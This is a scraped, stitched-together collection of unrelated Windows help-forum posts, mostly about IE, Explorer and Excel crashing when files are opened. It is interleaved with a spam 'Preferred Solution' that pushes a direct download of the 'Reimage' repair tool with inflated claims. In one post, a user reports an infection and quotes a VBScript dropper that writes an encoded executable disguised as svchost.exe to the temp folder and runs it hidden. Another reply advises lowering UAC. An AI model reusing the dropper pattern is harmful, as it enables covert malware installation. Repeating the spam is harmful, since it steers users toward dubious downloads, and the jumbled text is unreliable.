IE crashes when I try to open any local html file

Q: IE crashes when I try to open any local html file

When I try to open a local html file (either by right clicking on it and opening with IE, or by loading IE and then dragging and dropping a file onto it), IE immediately crashes.
Specifically, it will come up with the crash popup window "Internet Explorer has stopped working". You click "Close the program" and it does it a second time (which is normal behaviour for how IE will try only twice, to avoid an infinite loop), and then you end up still in IE on that page that says "We were unable to return you to the page you were viewing."
It is not an issue with the code or content of the html file. Even a file that just says "hello" in it will crash this way.

Preferred Solution: IE crashes when I try to open any local html file

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

Hi, im new here, and I hope you guys can help

Like the title says when I try click on a html file windows pops up the error saying windows explorer has encountered a problem... closes all he explorer windows and im looking at my desktop again.

What causes this? It's also happened with some avi files that i had that were 0kb big. I couldn't delete them becuase windows defaulted to loading up thumbnails of them and that crashed it. So I made windows show it as a list instead, and then i could delete them, but it doesnt work in this case because i have them set to tile the icons so now it only crashes when I click on it.

I don't remember what I could have done to cause this, other than installing firefox.

Thanks for any help

As of 4th July 2009 weekend my system has been operating quirky and buggy. In my troubles I've installed Avast Anitvirus. Now around that time, one day I can recall returning to my computer and it had shutdown on its own, although my system remains on idle the majority of the week by the way. At that point, when attempting to open a program (by clicking on any of my icons on the desktop) the computer would quirk and reboot. Welcome to Vista Forums!

Go to: File association fixes for Windows Vista and click on the html option and fix the file association for html files. Once done, I believe IE should be able to open them.

I hope this helps. If not, post back and we'll try to find another solution.

Good luck!

Hello and this is my First Post

Can you help me with an annoying dialog that pops up when running shortcuts please?

I have (portable) applications located on E:

I can run those applications directly from E: without a problem - i.e. I don't get any warnings.

However if I create a shortcut to one of these applications and place the shortcut on the desktop ( on C: ), then running the shortcut causes an open file security warning (see attachment). The warning dialog claims it can't determine who created the file, because it comes from "a location outside your local network". Which is really strange because it is a locally installed hard drive.

The only explanation I have is I've used E: with a previous windows 7 installation on the same hardware, then I reformatted & reinstalled my Windows 7 partition, but kept E: untouched.

Couple of things I've tried are:
1) there is no "Unblock" button on the shortcut's properties dialog
2) Group policy editor changed to not preserve zone information
3) I couldn't find an exact match for this particular open file security warning when searching here and other forums

IE on my system often hangs when I attempt to open a file that I saved to my hard drive. It seems that it always happens if I save a page that contains a shockwave file. The page opens fine if I navigate from the internet, but if I attempt to open the file from my hard drive then the page hangs for ~25 seconds. After that everything works fine.

To reproduce the issue navigate to www.yahoo.com. Next, follow one of the links under "In the News". After the news page opens, save the file by clicking on the File - Save As... menu item and then under "Save as type" select "Web page, HTML only". Then click the Save button to save the file. Finally, open the saved file by clicking on the File - Open... menu item. On my system the text will appear immediately, but then IE will hang for a while, after which the advertisement will appear.

Any ideas?

Thanks a lot for any help!

I have a Hewlett Packard Vectra desktop pc
Pentium 3, 930 Mhz, 128MB ram
Windows XP home edition upgrade
This is a very strange problem, it may have to do with my registry.
After running a registry scan and fixing errors, I noticed that all
my software programs that display any kind of html, such as
Outlook Express, my html editor, my keyword research tool, and
my webpage design software, will no longer display, but instead,
a windows screen pops up prompting me to either open the file
in my browser or save it, thus, rendering my software programs
useless. I have no idea how to fix this and I don't have the technical
knowledge for this type of problem. If need be, I will reformat
the hard drive and just start over, but would rather fix the problem.
I scanned the registry twice (mistake), so I don't think I can go back to the way it was.

Any ideas? Thanks.

We use Exchange 2010 Standard and Outlook 2013. I got a new computer and made a copy of my email archive that was being stored on my Windows 8 computer under c:\users\UserName\AppData\Local\Microsoft\Outlook . Now I want to open the archive to look for an old message. Outlook 2013 won't open the file.

Error, "The file you chose is not an Outlook Data File. You must select a new file of this type."

Outlook 2013; File Menu; Open & Export; Open Outlook Data File - that will open the file browse window with the file type of Outlook Data Files listed. To show the archive, I had to change it to All Files. The file extension is hidden, but the details of it show the Type is "Outlook Data File". If I try to open it, I get the error above. Looking at the properties of the file, it is an .OST Outlook Data File.

I know that Outlook wants to open a .PST file, but I need to open an .OST file. The Exchange Server did not change. The network user did not change. The only thing that changed was the old computer was removed from Active Directory and the New Computer was added - and the network user properties was updated to the new computer.

I'm currently in the process of testing/deploying IE11 in our environment and I've begun testing on the IE11 Enterprise Site List manager.
I've read that there are a few different ways to configure the XML file to apply via GPO per the article below.  HTTP, Local Network, Local File. (https://technet.microsoft.com/en-us/library/Dn640699.aspx)
In my isolated testing I've chosen to use the local file method which is very easy to setup and use on a testing machine.
It looks like we have the flexibility to choose how we apply the XML file, and I was curious what the best options are and why?  Also are there examples of each setup being used and the benefits/downsides to each?
Here's the options that I can see using:
1. HTTP - setup an IIS website to host the XML file.
2. Local Network (UNC) - setup a UNC path on our DFS where we store the current XML file and users would have read only access to that location.
3. Local File - We could just deploy the XML file via SCCM package/application when updates to the list are required.
Could anyone please point me towards some articles, etc, explaining the pro's and cons of these methods and why I might want to choose one over the other?  I'm leaning towards just using a DFS share and option #2 because it doesn't require us to maintain
an IIS site for it but I am curious to hear if there might be any downsides to this method, or benefits to going with another method.

I hope someone can help me.
As part of some work for a client, I created an Excel Application. It is a data collection form. The user inputs data onto several tabs within the form, and then emails the collated data to specific recipients. Now this all seems to work fine.
However I have the following problem:

Start Excel
Open file 'Order Form' (Order Form is my Excel/VBA program)
Excel asks to enable/disable macros
Enable macros
Excel crashes

Now if I do the following:

Start Excel
Open file 'Order Form'
Excel asks to enable/disable macros
Disable macros
Save file (same name/location)
Close file (not Excel)
Open file
Enable macros
Program opens fine.

I'm starting to lose my mind . I have searched various forums with no luck.
Unfortunately , the problem doesn't happen on my own machine, only on the clients. They have Excel 2000 on XP (I'm running 2007 - Vista), although when I have developed parts on my machine and saved it in 2000 format, the problem still occurs on their machines.

Does anybody have any idea on what I can try? It seems that once the first sequence has been done, then I can open/close the file with no problem. Is there some environmental setting/add in/????? that could be causing the problem?

Any help would be appreciated.

Hi guys,

The interesting thing is the file was exhibiting this behavior on one computer, and I transferred it to this one, to two places, and they each have issues. Opening it in safe mode crashed as well. This file is very important to me, please help! Thank you.

Hello everyone.

I have been unable to view the properties of certain files. Whenever I select the file, right-click, and select Properties, Windows Explorer crashes and restarts. The same thing happens when I try to select Properties through the Organize menu dropdown.

I found a couple of relevant threads in this forum, but they don't seem to have been resolved:

Right Click Properties Crash

My issue is more similar to the first thread. It is only files, not folders or drives. And it is only certain types of files; the affected file types seem to be video files in general, while all other file types seem OK, although mp3 files seem to be a mixture of both (some works and some fails).

Anyway, I have tried all 4 methods provided by Sir George in the first thread. My graphic drivers are up to date, the sfc/scan came up clean (screenshot 1), the Microsoft Safety Scanner came up clean (screenshot 2), and the problem persisted after booting in safe mode, as well as after a clean boot.

I have even scanned and fixed the registry using AVG PC TuneUp, turned off the Data Execution Prevention (DEP) feature, and scanned the hard drives for errors. There were no errors found from scanning the hard drives, and the problem remained.

Can anyone please provide me with further advice or instructions? Any insight would be very much appreciated.

Hi all, first time poster\long time reader and enthusiast.

I am a PC tech for a large corporate network, and one of our users called in to say that she suddenly could not open Excel files. I connected to her machine and found that I can open excel documents from the desktop icons, as well as through windows explorer, but the issue exists as soon as you select "open" from the File menu in excel. When you attempt to open a document that way, the standard "Microsoft Office Excel has encountered a problem and needs to close" message, also giving the option to save work and re-start excel.

She is running office 2003 professional SP2 on a dell optiplex gx280 with 256 meg of ram. She's never had an issue in the past, and has not installed any new software recently, so no conflicts are likely, this is just a sudden issue.

I attempted a repair installation, a complete uninstall\reinstall, and applied all available updates from the Microsoft website, and nothing has solved the problem.

Hopefully you guys can help!

Thanks in advance

It doesn't work, and then when I go back into "File Types", html is not listed anymore. Basically, Windows is ignoring my attempts to add the .html file type.

I created the .xxx file type and added actions to open with Firefox and Word. It worked perfectly.

So what is it with the .html file type that Windows won't create it or list it?

As a work around, I would like to propose the following suggestions:1. Change User Account Control Settings.1) Click the Start button and type: UAC in the Search box.2) Click "Change User Account Control Settings".3) Drag the slider to a lower setting.4) Click OK.2. Configure Group Policy Settings.1) Click the Start menu and type: GPedit.msc in the Search box.2) Click on gpedit.3) Navigate to the following entry:User Configuration\Administrative Templates\Windows Components\Attachment ManagerIn the right panel of the Local Group Policy Editor, find the entry: Inclusion list for moderate risk file types. Double click the entry and check "Enabled".4) Under 'Inclusion list for moderate risk file types', type the file types: .ink (shortcut types)5) Click OK and restart the computer.Best RegardsDale

Hi, I'm a web designer and I use a mac to design and test local pages on my PC (xp) via remote desktop app (as I only have one monitor) Filesharing works ok between machines and firefox on the PC loads the HTML files on the mac instantly, so no network probs. IE6 takes over 20 seconds, which is annoying when I am quickly making changes and testing. Could IE be running security checks or something causing the delay? Firewalls are off on both machines. Thanks guys, Dren.

HiI am unsure what is infecting my computer but it is adding the following script to all local html files whenever the computer restarts:[codebox]&lt;script Language=VBScript><!--DropFileName = "svchost.exe"WriteData = "4D5A...00"Set FSO = CreateObject("Scripting.FileSystemObject")DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet WSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>[/codebox]I have run DDS and attached the log but I can only run GMER in safe mode; running normally I get a BSOD of 'bad pool header' type as soon as GMER starts running.Sorry this is vague; I have run MalwareBytes, Super AntiSpyware, SpyBot Search & Destroy, Advanced System Protector and A Squared Free. They all locate stuff which reappears every time the computer restarts. I ran all these programs after disconnecting to the internet. Thanks in advance and I would really appreciate any light you could shed on this - I haven't been able to find anything through Google of this issue. All the bestMike

My organization relies on a public safety program that will only work with IE8/9. I tried Enterprise Mode but it appears that it doesn't work with files that are on the hard drive. I did verify that it worked by adding whatsmybrowser.org to the
list and it reported the browser as IE8. Each computer that this goes on has a unique ID so this isn't something we could put on the web or intranet. Is it possible to point to a local folder that contains the *htm files?

hello all, i hope you'll help me out with a problem (or remnants of one) that i've been having.

earlier today just in the middle of ordinary document writing (an html file with notepad) AVG (free edition) popped up with a malware warning. the apparent culprit was an old installation file (.exe) which i thought was weird since it had been sitting on my disk for over a year with no trouble or even use beyond the first time i used it.

later i found that local html files were causing an active-x warning to pop up whenever i opened them, which is even stranger since the files are very basic, just text and a little formatting such as tables, and occasional images. although the messages were annoying i decided to leave fixing the problem till later in the day, and continued with my documents and the occasional net browse to check facts etc.

later still suddenly another AVG warning came up, this time saying that iexplore.exe was infected with blackhole. AVG cleaned up, but the active-x warnings from local pages that have no active-x or any script of any kind are continuing which has left me worried. my guess is that my iexplore.exe file got infected, but i don't what infected it, how to fix it, or if the infection is completely gone. i find it hard to believe that the original culprit was an old installation file.

i ran a full malwarebytes scan which turned up nothing, ran hijackthis also which showed nothing i couldn't identify, looked thru the current version - ... Read more

Hello,My Avira keeps finding daily everytime I scan it.....HTML/Exploit.Mhtml HTML and HTML/Infected.WebPage.Gen HTML script viruses. This has been going on a long time. The only thing I have noticed is high cpu 90-100% in task manager all the time, which does'nt seem to impact the speed of the computer. Occasionally, I pick up things in Malwarebytes and Spybot if I neglect to run a scan on Avira for a few days. I've also scanned Adaware and Avast but nothing shows up on them. Microsoft Edge 25.10586.0.0 reported timeout and failed to read local HTML files after the latest Windows update January 2016.

All other browsers such as Safari, Chrome, Opera succeed to to read those HTML files from local hard disks,
as did the previous MS Edge version.

What is the max for its timeout ?

Can one adjust/set the timeout for MS Edge ?

Could it report the time it used and the defined time it had ?

I cannot click on Windows File Explorer in my task bar or start menu. No error, just a spinning circle and then my icons disappear and come back immediately.

Windows key + E does nothing. Literally, nothing.

If I use other programs to view file in original location, I can sometimes get it open. I can also get it open if I type c: in the search box. However, if I use these methods and dare to right-click, it immediately crashes.

Google search gives me other people posting this issue, with no real fix.

Hi all,

A new program (Autodesk Revit architecture 2009) I have installed opens an HTML file on startup (a recent files page named index.html)

When it comes to starting the program, I get a pop up informing me of a file download and whether I want to open or save it.

Problem is that it should just open it automatically...

When I click 'open' internet explorer does nothing with it. (I have managed to open it from here in firefox ((which proves the file is valid - but is useless in firefox)), but it still won't open automatically in Revit).

The html is created on the fly in the C:\temp folder.

When I close this message and move on to try and register the program,
another html attempts to open and I get the same problem... Which means the programme is totally un-usable!

Why does my XP all of a sudden not recognize html files from this program???

Any help would be greatly appreciated!
